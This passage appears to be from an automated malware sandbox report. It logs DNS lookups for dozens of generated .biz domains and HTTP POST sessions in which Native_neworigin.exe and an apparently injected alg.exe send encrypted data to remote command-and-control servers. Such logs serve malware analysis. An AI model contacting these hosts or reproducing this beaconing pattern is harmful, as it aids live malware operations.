                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.713192940 CET1.1.1.1192.168.2.100x523fNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.935538054 CET1.1.1.1192.168.2.100x9634No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.583882093 CET1.1.1.1192.168.2.100x7937No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.236032009 CET1.1.1.1192.168.2.100xdcb6No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.236048937 CET1.1.1.1192.168.2.100xdcb6No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.581486940 CET1.1.1.1192.168.2.100x1f1cNo error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.922471046 CET1.1.1.1192.168.2.100x67c2No error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.441800117 CET1.1.1.1192.168.2.100xb5eNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.915800095 CET1.1.1.1192.168.2.100x1095No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.949903011 CET1.1.1.1192.168.2.100xebeNo error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.771186113 CET1.1.1.1192.168.2.100xa866No error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.396346092 CET1.1.1.1192.168.2.100x939cNo error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.109278917 CET1.1.1.1192.168.2.100xc2e1No error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.257509947 CET1.1.1.1192.168.2.100xbe3fNo error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.802278996 CET1.1.1.1192.168.2.100x5011No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.307353973 CET1.1.1.1192.168.2.100x2cb7No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.488157034 CET1.1.1.1192.168.2.100xe8acNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.213124990 CET1.1.1.1192.168.2.100x1d51No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.904475927 CET1.1.1.1192.168.2.100xd7d1No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.001612902 CET1.1.1.1192.168.2.100xef0bNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.361455917 CET1.1.1.1192.168.2.100xd039No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.394504070 CET1.1.1.1192.168.2.100xb014No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.240638018 CET1.1.1.1192.168.2.100x28faNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.260457039 CET1.1.1.1192.168.2.100xc519No error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.947098017 CET1.1.1.1192.168.2.100xa28No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.701354027 CET1.1.1.1192.168.2.100xbb2Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712205887 CET1.1.1.1192.168.2.100x2a3eName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.719713926 CET1.1.1.1192.168.2.100x45e4No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.941885948 CET1.1.1.1192.168.2.100x795cNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.442914963 CET1.1.1.1192.168.2.100xa413No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021334887 CET1.1.1.1192.168.2.100xee63No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021348953 CET1.1.1.1192.168.2.100xee63No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.731262922 CET1.1.1.1192.168.2.100x6992No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET1.1.1.1192.168.2.100x35faNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET1.1.1.1192.168.2.100x35faNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.718348026 CET1.1.1.1192.168.2.100xb9d5No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • giliplg.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49801 | 54.244.188.177 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:28.724061012 CET | 353 | OUT | POST /nkrerhrn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
Nov 18, 2024 09:57:28.724087954 CET | 836 | OUT | Data Raw: f8 1c 8a 5f 73 b0 fd b8 38 03 00 00 5f f8 a4 7f 96 82 b0 97 20 c2 45 8d e0 dc 89 8e ba 69 78 3e 29 8e 04 57 7c 83 7c f6 f9 c3 8a e8 50 97 1c ce 36 3d 12 81 c1 37 ad ae c1 a2 6d 43 e4 c0 de 4c 3a 32 b6 e9 10 fa 0d 1e c8 20 d1 86 12 2a 47 72 7f f4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _s8_ Eix>)W||P6=7mCL:2 *Gr9(o*?qY3 o9mznj,-AG^)7_?g7;@16.VOj8gM$9wt]Kq3:Rgp&=Qa
Nov 18, 2024 09:57:29.568247080 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=81f90664e47072629625179d702375cd|155.94.241.187|1731920249|1731920249|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49813 | 18.141.10.107 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:31.452289104 CET | 345 | OUT | POST /iu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
Nov 18, 2024 09:57:31.452866077 CET | 836 | OUT | Data Raw: c6 a4 fb 4d c3 ce 55 fb 38 03 00 00 e8 20 61 19 a7 4b dc 99 45 91 01 bb 9e 98 e2 1e 82 22 f2 ce 99 55 fd ec b1 eb 90 60 89 75 ce 2e f3 a9 39 86 0b 83 db 54 07 74 84 2b 2a 37 a3 be fa 50 1a db 40 f1 b0 7a 52 51 5d 39 94 e8 39 e2 5e 19 ef ae 6d cf
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MU8 aKE"U`u.9Tt+*7P@zRQ]99^mRD1~sI*r\N-84.:B2DPPeUz5\[Tq-sm`d\1:\bz8"IX8ph0[N;[KWUzIyc
Nov 18, 2024 09:57:32.866704941 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=581adf12b1fabf79c0b668fa7f972696|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49817 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:32.042726040 CET | 354 | OUT | POST /obvywkjre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:32.042829037 CET | 778 | OUT | Data Raw: 0b 69 cf ca 43 c8 d8 7b fe 02 00 00 e9 1b 6d 30 e8 90 ac bb 1e da f6 27 a3 4c f5 64 f3 86 4e 7f 9c c1 17 7a 36 75 84 61 05 ff 0a c2 d5 0f b8 f8 88 33 4b 06 ee 7c 75 1c 1e fc d4 04 01 9c 22 6d 62 1a d8 4c c7 ad 4d 97 78 28 41 77 0e 59 99 7b 22 99
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: iC{m0'LdNz6ua3K|u"mbLMx(AwY{"Vs[!8RRMW+V(5(oiAAV},sv&VfoZW>igqjqwL~0[ApY&1!;FV<A[g_Bvxvf`
Nov 18, 2024 09:57:32.851788998 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d3aa7e31e97c9d91bce604b07cc7d225|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49823 | 18.141.10.107 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:33.123837948 CET | 357 | OUT | POST /njfejhipdedfbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:33.123857021 CET | 778 | OUT | Data Raw: dd 3a 48 59 69 9f 37 74 fe 02 00 00 f7 21 30 d4 32 30 6f 29 a9 37 fe 37 19 2c 2b d0 07 11 bb 97 b8 ac 5c 39 8d d0 4f ee 30 50 e0 bd eb 64 ae b6 28 4a bc 06 9f 07 03 35 fa be ac 44 f2 e2 f2 0e 6f 4f 2e 05 4c ab 9a 95 71 b4 c9 f0 e0 a3 ed 29 84 8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :HYi7t!020o)77,+\9O0Pd(J5DoO.Lq)1%9+J-d:k@n3E^O_v1StX*Q^NOJf['2<0\zNPL FM==1-'b{"y Bksi~
Nov 18, 2024 09:57:34.582048893 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6f86f303f282354af2ad9d8cf005f947|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49830 | 54.244.188.177 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:34.208509922 CET | 348 | OUT | POST /gcjwtno HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
Nov 18, 2024 09:57:34.208550930 CET | 836 | OUT | Data Raw: 67 3a ac 4a 80 d7 59 ef 38 03 00 00 6e 71 1e 89 ad a1 3f 68 f6 f1 c6 20 8d cc c8 93 a9 c5 6f b6 79 67 ed b7 e7 48 86 af e5 85 67 c3 5c 9d 5c 65 23 3d 89 5f 3a 1c 2a 9b d0 3d cd a1 74 82 4e 41 8e c2 61 bc 85 67 a1 3b 0a 9a 00 1c 07 99 50 91 f4 61
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: g:JY8nq?h oygHg\\e#=_:*=tNAag;Pa-rge<v`oayUI=Dq}S{5l-=-{W(,<2gWO|H o88FbO>)^T}!mtz~y--}5h
Nov 18, 2024 09:57:35.035238981 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d5d5568a6abce50cdafcd4af846e675a|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49834 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:34.894289017 CET | 349 | OUT | POST /itufvxod HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:34.894336939 CET | 778 | OUT | Data Raw: 45 32 7c 5c b2 3c a9 30 fe 02 00 00 a7 95 fb 15 10 9c 9f 43 09 73 33 96 b3 21 d6 17 bc 32 c6 af 4c fa 07 e4 14 05 4c 0a 36 25 6f 1b 36 78 8b d0 79 09 22 69 3d 4c 22 a9 2d d0 22 ff bb f2 4c 35 d0 85 ed bf 21 c1 ca 2e 5c 9e 2d 5e 2d 40 6f 5f d6 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E2|\<0Cs3!2LL6%o6xy"i=L"-"L5!.\-^-@o_1hQ/32eSCOh,ij]Z8/a7$1!&T]@P .uVl[FNM3A'_fz"x94slT0P7+m)L#~o{($
Nov 18, 2024 09:57:35.720582962 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=02aa6920d185758ebb1c81820c3ccff2|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49837 | 44.221.84.105 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:35.274419069 CET | 353 | OUT | POST /jpdqgjmmo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
